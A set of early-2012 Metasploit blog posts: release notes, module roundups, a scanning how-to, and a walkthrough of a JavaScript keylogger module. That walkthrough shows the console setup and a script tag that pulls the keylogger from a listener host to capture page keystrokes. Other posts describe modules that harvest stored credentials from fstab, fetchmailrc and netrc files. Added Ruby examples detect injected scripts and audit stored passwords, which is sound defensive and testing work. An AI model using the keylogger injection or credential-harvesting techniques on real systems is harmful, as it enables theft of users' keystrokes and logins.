Metasploit Blog, February 2012

Since our last release in October, we've added 54 new exploits, 66 new auxiliary modules, 43 new post-exploitation modules, and 18 new payloads -- that clocks in at just about 1.5 new modules per day since version 4.1. Clearly, this kind of volume is way too much to detail in a single update blog post. Of course, you could just dive in and download the latest version to get started. In the meantime, here are the highlights for this latest release of Metasploit.

 

IPv6 Coverage

 

Metasploit 4.2 now ships with thirteen brand new payloads, all added to support opening command sessions and shells on IPv6 networks. In addition, Metasploit's existing arsenal of payloads has been updated to support IPv6 as well. The database back end now fully supports IPv6 addressing for discovered and compromised hosts. Rex, Metasploit's general purpose socket and protocol library, is now compatible with IPv6 networks. The ability to launch attacks over IPv6, even in otherwise IPv4 networks, is crucial in the modern penetration testing environment, so if you're not yet up to speed on auditing a client network's IPv6 exposure, be sure to catch HD Moore's free IPv6 security online training on March 28.

 

Virtualization as an Attack Vector

 

With this release comes a pile of new modules targeting the VMware vSphere/ESX SOAP interface, as well as a pair of new brute force modules to audit password strength for both vmauthd and the Virtual Web Services. Here's the quick list of the new virtual target hotness:

 

  • vmauthd_version : Discovers the version details for a vmauthd service
  • esx_fingerprint : Fingerprints a stand-alone ESX server (down to the build number)
  • vmware_http_login : Attempts to brute force local VMware credentials via the Web Services interface
  • vmauthd_login : Attempts to brute force local VMware credentials via the vmauthd service
  • vmware_enum_users : Enumerates both local and domain VMware user accounts
  • vmware_enum_permissions : Enumerates locally-defined user and group permissions on a VMware instance
  • vmware_enum_sessions : Enumerates active VMware login sessions
  • vmware_enum_vms : Enumerates all local virtual machines on the local VMware instance
  • vmware_host_details : Discovers host hardware and software details of the VMware host machine
  • poweroff_vm : Powers off a virtual machine via the VMware Web Services interface
  • poweron_vm : Powers on a virtual machine via the VMware Web Services interface
  • tag_vm : Writes a user-defined "tag" to the VMware logs as proof of compromise
  • vmware_screenshot_stealer : Grabs screenshots of VMware guest operating systems as proof of compromise
  • terminate_esx_sessions : Disconnects a user from the ESX server

 

Virtual machine targets in a network often offer unique avenues of attack for penetration testers, and are sometimes overlooked by IT departments and security infrastructure groups alike. Rapid7's David Maloney, aka TheLightCosine, wrote most of these modules. For a deep-dive into virtualization security, please join his webcast on March 21.

 

New Resource Scripts

 

Metasploit 4.2 now ships with fourteen new resource scripts, nearly all of which were provided by open source community contributors. These scripts demonstrate the power of Metasploit's extensible architecture, allowing programmatic Metasploit module usage through the powerful Ruby scripting language. By automating away penetration testing tasks common to most engagements, Metasploit expert users can free up valuable time for more interesting avenues of research and exploitation. Note that while these scripts are useful on their own, they're also great examples of using this entry point and really getting your hands dirty with Metasploit internals. Finally, most of these scripts were submitted by open source contributor m-1-k-3, while the Oracle-centric scripts come from nebulous.

 

The Ghost of Updates Past

 

Since January or so, we've been detailing the progress of Metasploit development here on the blog, so other big updates won't come as much of a surprise to regular readers. Metasploit 4.2 includes Chao-Mu's reload of Railgun, HD's SSH public key scanner and H.323 video conferencing scanner, Jon Cran's overhaul of MSF Labs, expanded 64-bit payload coverage, and bunches more.

 

Details and Availability

 

For detailed information on this release, check out Jcran's most excellent release notes. To start playing with the shiny new Metasploit 4.2, download your free copy now.


Rarely does a week go by without a friend or family member getting their login credentials compromised and then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don't understand how their credentials get compromised. Password reuse across several websites is usually the culprit. Password reuse is a problem even if a website encrypts the passwords in its database: an attacker only needs to insert some evil code into the site and let it do the work for them.

This is one of the many reasons the Internet is like a minefield, with malicious code around every turn. If an attacker can insert code on a website, they don't need to crack any passwords. Keyloggers can be included on most websites with one line of code, and the activity that ensues is pretty awesome from an attacker's perspective: they can sit back and watch credentials magically appear. It reminds me of fishermen's tales of fish jumping into their boats.

 

In the information security field, Metasploit is the ultimate "I can show you better than I can tell you!" software. Security professionals need to be able to demonstrate exploitation techniques to users and management. I have seen Javascript keyloggers out there in the wild, but couldn't find a scalable, easy-to-deploy version.

So I sat down a couple of weeks ago and wrote a Metasploit-based Javascript keylogger from scratch. I have to give props to Wei, Tod, and HD for motivation and help with fine-tuning the module. Adding exploitation techniques to Metasploit solves any scalability and deployability issues. James "@egyp7" Lee presented a talk at the last BSides Las Vegas on why it makes sense to develop these types of tools using Metasploit: Metasploit has tons of code that you can reuse to build almost anything, like Lego blocks.

 

The Metasploit Javascript Keylogger sets up an HTTP/HTTPS listener which serves the Javascript keylogger code and captures the keystrokes sent back over the network. I've included a demo page within the module for testing purposes. Just enter "set DEMO true" during module setup, as you can see below, to activate the demo page. To access the demo page, just append "/demo" to the URL provided.

Once the Javascript <script> tag is embedded in a webpage, the keylogger captures every keystroke entered on that page, including tabs, carriage returns, and backspaces.

 

Step 1: Module setup:

 

msf > use auxiliary/server/capture/http_javascript_keylogger 
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options


Module options (auxiliary/server/capture/http_javascript_keylogger):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DEMO        true             yes       Creates HTML for demo purposes
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(http_javascript_keylogger) > run

[*] Using URL: http://0.0.0.0:8080/qZBRzd
[*]  Local IP: http://192.168.1.131:8080/qZBRzd
[*] Server started.

 

Step 2: Demo page URL


Step 3 (optional): To embed the keylogger into any webpage, reference a reachable URL of the listener from an HTML <script> tag, with "/[whatever].js" appended to the path:

<script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js"></script>

 

Screen Capture 1: Module setup and run

Screen Capture 2: Demo page

Screen Capture 3: Keystrokes captured and stored to loot
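The tag in Step 3 is also what a defender has to look for: a script host in a page's HTML that the site never used before. As an added example (not part of the original post or of the Metasploit module), the Ruby script below lists every external script a page loads, flags the ones whose host is not on an assumed allowlist, and builds the Content-Security-Policy script-src value that makes the browser refuse such an injected tag; the HTML and the allowlist are constructed samples.

```ruby
require 'uri'

# Constructed sample page (assumption): one same-origin script, one CDN
# script the site really uses, and the Step 3 keylogger tag injected at the end.
SAMPLE_HTML = <<~HTML
  <html><head>
  <script src="/js/app.js"></script>
  <script type="text/javascript" src="https://cdn.example.com/jquery.min.js"></script>
  </head><body>
  <form action="/login"><input name="user"><input name="pass" type="password"></form>
  <script type="text/javascript" src="http://192.168.1.131:8080/qZBRzd/test.js"></script>
  </body></html>
HTML

# Hosts this site legitimately loads scripts from (assumed allowlist).
ALLOWED_SCRIPT_HOSTS = ['cdn.example.com'].freeze

# Every URL referenced by a <script ... src="..."> tag, in page order.
def script_sources(html)
  html.scan(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/i).flatten
end

# Script URLs that are neither same-origin (relative src, no host) nor on the
# allowlist; an unparsable src is reported as well rather than silently skipped.
def foreign_scripts(html, allowed_hosts)
  script_sources(html).select do |src|
    host = (URI.parse(src).host rescue src)
    !host.nil? && !allowed_hosts.include?(host)
  end
end

# Content-Security-Policy value that lets the browser refuse any script not
# served by the page's own origin or an allowlisted host, so an injected tag
# like the one above never executes even if the HTML itself is modified.
def csp_for(allowed_hosts)
  sources = ["'self'"] + allowed_hosts.map { |h| "https://#{h}" }
  "script-src #{sources.join(' ')}; object-src 'none'"
end

if __FILE__ == $PROGRAM_NAME
  foreign_scripts(SAMPLE_HTML, ALLOWED_SCRIPT_HOSTS).each { |s| puts "unexpected script: #{s}" }
  puts "Content-Security-Policy: #{csp_for(ALLOWED_SCRIPT_HOSTS)}"
end
```

Run against the sample, it reports only the keylogger tag; the CSP header it prints is the part that keeps working after the page itself has been tampered with.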

As always, hack responsibly. Let me know if you have any questions in the comments.

 

If you haven't looked at Metasploit Community Edition, you should definitely give it a try.

 

You can also hit me on Twitter @threatagent.

This week, with RSA 2012 fast approaching and the final touches on Metasploit version 4.2 getting nailed down, we've been in a code freeze for core Metasploit functionality. However, that doesn't apply to the parade of modules, so here's what's in store for the next -- and quite likely last -- update for Metasploit 4.1.

 

Authentication Credential Gathering and Testing

 

Jon Hart (of Nexpose fame) has been on fire with new Metasploit contributions -- this week, he's come up with a trio of credential-snarfing post modules. mount_cifs_creds picks up the saved credentials from a Linux machine's /etc/fstab file (used when auto-mounting SMB/CIFS file shares on Linux workstations); fetchmailrc_creds picks up stored e-mail credentials used by the popular Fetchmail utility; and netrc_creds pulls credentials from a user's local .netrc file (usually private FTP credentials).

 

Once you've snagged credentials with these and other modules, open source contributor m-1-k-3 has supplied a nifty new resource script, auto_cred_checker.rc. This script runs through all the credentials currently in the Metasploit database and validates them by loading up the appropriate service login auxiliary module and giving the creds a shot. Super cool.
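The files those post modules read are ones a defender can audit first. As an added example (not one of Jon Hart's modules), the Ruby script below parses constructed /etc/fstab and .netrc samples, reports CIFS mounts whose options carry an inline password and every .netrc login, and names the fix for each without echoing the secrets.

```ruby
# Constructed /etc/fstab (assumption): one share with an inline password (the
# case mount_cifs_creds harvests) and one using a root-only credentials file.
SAMPLE_FSTAB = <<~FSTAB
  # <file system>        <mount point> <type> <options>                                      <dump> <pass>
  UUID=abcd-1234         /             ext4   errors=remount-ro                               0      1
  //fileserver/finance   /mnt/finance  cifs   username=svc_fin,password=Winter2012,domain=CORP 0     0
  //fileserver/public    /mnt/public   cifs   credentials=/root/.smbcred,uid=1000,ro          0      0
FSTAB

# Constructed ~/.netrc (assumption) in the single-line form.
SAMPLE_NETRC = <<~NETRC
  machine ftp.example.com login alice password s3cret
  machine api.example.net login bob password hunter2
NETRC

Finding = Struct.new(:source, :target, :user, :password, :fix)

# CIFS/SMB mounts in fstab text whose mount options carry a password inline.
def fstab_findings(text, path = '/etc/fstab')
  text.each_line.with_object([]) do |line, out|
    next if line.strip.empty? || line.lstrip.start_with?('#')
    fs, _mount, type, opts = line.split
    next unless %w[cifs smbfs].include?(type)
    kv = opts.split(',').map { |o| k, v = o.split('=', 2); [k, v] }.to_h
    next unless kv.key?('password')
    out << Finding.new(path, fs, kv['username'], kv['password'],
                       'move the credentials to a credentials= file owned by root with mode 0600')
  end
end

# Every machine/login/password triple in .netrc text (the netrc_creds case).
def netrc_findings(text, path = '~/.netrc')
  text.each_line.with_object([]) do |line, out|
    m = line.match(/\bmachine\s+(\S+)\s+login\s+(\S+)\s+password\s+(\S+)/) or next
    out << Finding.new(path, m[1], m[2], m[3],
                       'make sure the file is mode 0600, or replace the stored password with a credential helper')
  end
end

# One report line per finding; the password itself is never printed.
def report(findings)
  findings.map { |f| "#{f.source}: #{f.user}@#{f.target} has a stored password -> #{f.fix}" }
end

if __FILE__ == $PROGRAM_NAME
  puts report(fstab_findings(SAMPLE_FSTAB) + netrc_findings(SAMPLE_NETRC))
end
```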

 

New Modules and Scripts

 

As usual, we have a handful of other new modules and scripts this week.

 

  • adobe_flash_sps, by sinn3r, exploits CVE-2011-2140 in Adobe's Flash Player.
  • c6_messenger_downloaderactivex exploits CVE-2008-2551 in an ActiveX control in Icona's C6 Messenger, and was submitted by Juan Vazquez.
  • citrix_streamprocess_data_msg exploits the Citrix Provisioning Services vulnerability described in ZDI-12-009, and was submitted by alino.
  • sunway_force_control_netdbsrv exploits OSVDB-75798, a vulnerability in the SCADA human-machine interface (HMI) application Sunway Forcecontrol, and was provided by contributors Rinat Ziyayev and James Fitts.
  • m-1-k-3 also provided two new resource scripts: basic_discovery.rc, which automates port scanning, and multi_post.rc, which automates a bunch of common post-exploitation tasks.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

When we talk to Metasploit users, they usually use it for either penetration testing, password auditing or vulnerability validation, but few use it for more than one of these purposes. By leveraging your investment in Metasploit, you can triple-dip at the same price - no extra licenses needed.

 

Penetration Testing

 

With penetration testing, you can identify issues in your security infrastructure that could lead to a data breach. Weaknesses you can identify include exploitable vulnerabilities, weak or shared passwords, vulnerable web applications, and low security awareness among your staff. Typically, penetration tests are set up as projects, although companies are starting to adopt penetration testing as a program to:

 

  • Regularly assess the security of their infrastructure
  • Test the security of new applications and systems before roll-out
  • Re-test the security of systems after major changes

 

Password Auditing

 

Adding password auditing to your security program can really help you lower the risk of a data breach. By regularly scanning your network, Metasploit's brute forcing function can help you identify the following issues:

 

  • Weak passwords that lack length or complexity
  • Passwords contained in dictionaries
  • Passwords that are easily guessed based on information about the infrastructure
  • Vendor default passwords
  • Replaying cached credentials
  • Re-use of passwords across trust zones
  • Development test credentials in a production environment
  • Active accounts of previous employees

 


Vulnerability Validation

 

This is a lesser-known use case for Metasploit, but a very powerful one if used right. Vulnerability scanners can typically only detect whether a vulnerable version of an application or operating system is installed on a system. However, not all vulnerabilities are exploitable, and only exploitable vulnerabilities can lead to a data breach. If you don't know which vulnerabilities put the company's data at risk, you have to fix all vulnerabilities. If you have ever read the long reports of vulnerability scanners, you know this is a daunting and audacious task. Most companies don't have the resources to ever close this list out.

 

With Metasploit, you can validate whether a vulnerability is in fact exploitable. You should focus on remediating these vulnerabilities, and can safely ignore the vulnerabilities that cannot be exploited. After you have remediated an exploitable vulnerability, use Metasploit as your litmus test to see if it is now no longer exploitable. Metasploit can import the vulnerability scanning reports from all major vulnerability scanners, so you can leverage your existing infrastructure and investment.

 

While penetration testing and password auditing will increase the security of your infrastructure as a type of "security quality assurance", vulnerability validation is a tool that helps you reduce the workload of your security team and focus on issues that really matter.

 

If you're interested in testing out Metasploit Pro for either penetration testing or vulnerability validation, download a free trial now.

We've had a lot of people ask us how they can scan their own network to find out if they are vulnerable to the video conferencing issue described in HD's blog post Board Room Spying for Fun and Profit and the various news coverage of the video conferencing story. Here's a quick how-to:

 

  1. Download a free trial of Metasploit Pro.
  2. Create a New Project and click on Scan on the Overview tab.
  3. Click on Advanced Options.
  4. Change Custom TCP source port to 1720.
  5. Uncheck UDP service discovery for faster scanning.
  6. Ensure that Scan H.323 video endpoints is checked.
  7. To validate an identified service, connect with an H.323-capable client such as NetMeeting (Windows XP), Ekiga (cross-platform, but buggy), Mirial Softphone (commercial), or ClearSea In the Cloud (only able to reach internet-exposed devices). For internal systems, I still rely on NetMeeting in an XP virtual machine as the most reliable H.323 client; however, it lacks the Pan-Tilt-Zoom (PTZ) and keypad controls of a more advanced client like Mirial or ClearSea In the Cloud.

 

Get your free trial of Metasploit Pro now and start your scan!

PCAnywhere, Anywhere

 

The big news this week centered around Symantec's pcAnywhere. For starters, there's a new ZDI advisory for a buffer overflow in the username field. More notably, though, a Symantec white paper now advises customers to "disable or remove Access Server and use remote sessions via secure VPN tunnels." So, while the Metasploit elves bang away at a proper buffer overflow module, HD Moore busted out a pair of pcAnywhere service scanner modules, pcanywhere_tcp and pcanywhere_udp, and the Nexpose team wrote up a how-to blog post on auditing your infrastructure for pcAnywhere services using Dynamic Asset Groups. It's important to keep in mind that pcAnywhere has a tendency to show up as rogue software (not installed or approved by IT), so it would behoove one to audit one's network regularly -- to get started, you can download Metasploit here.

 

New Payloads

 

This week we also have a smattering of new payloads. Payload updates tend to be less frequent than modules, but payloads are pretty much what proves that a vulnerability is, in fact, exploitable. For that reason, it's always notable when new techniques and platforms are added into the mix. Community contributor argp provides osx/x64/exec, which allows for arbitrary command execution against 64-bit Mac OS X platforms. We also have three new payloads for PHP targets: php/bind_perl_ipv6 (by Samy and cazz), php/bind_php_ipv6 (by diaul and James "egyp7" Lee), and php/bind_tcp_ipv6 (also by egyp7).

 

New Modules

 

Of course, no update would be complete without the usual smattering of new modules:

 

  • vbseo_proc_deutf exploits BID-51647 against Crawlability's vbSEO plugin for vBulletin, submitted by EgiX.
  • ektron_cms400net, an auxiliary module which tests default passwords against Ektron CMS400.NET services, submitted by Justin Cacak.
  • vmware_http_login, which targets VMware Server, ESX, and ESXi for brute forcing, added by David "TheLightCosine" Maloney.
  • ms12_004_midi targets the Windows Media Player bug CVE-2012-0003 (aka MS12-004), provided by Wei "sinn3r" Chen and Juan Vazquez.
  • hp_magentservice exploits CVE-2011-4789, a bug in HP Diagnostics Server's magentservice.exe, submitted by hal.
  • find_vmx and enum_vbox, two post modules which enumerate local VMware and VirtualBox virtual machines, also by TheLightCosine.

 

As always, thanks to everyone out there in open source land for their efforts on these.

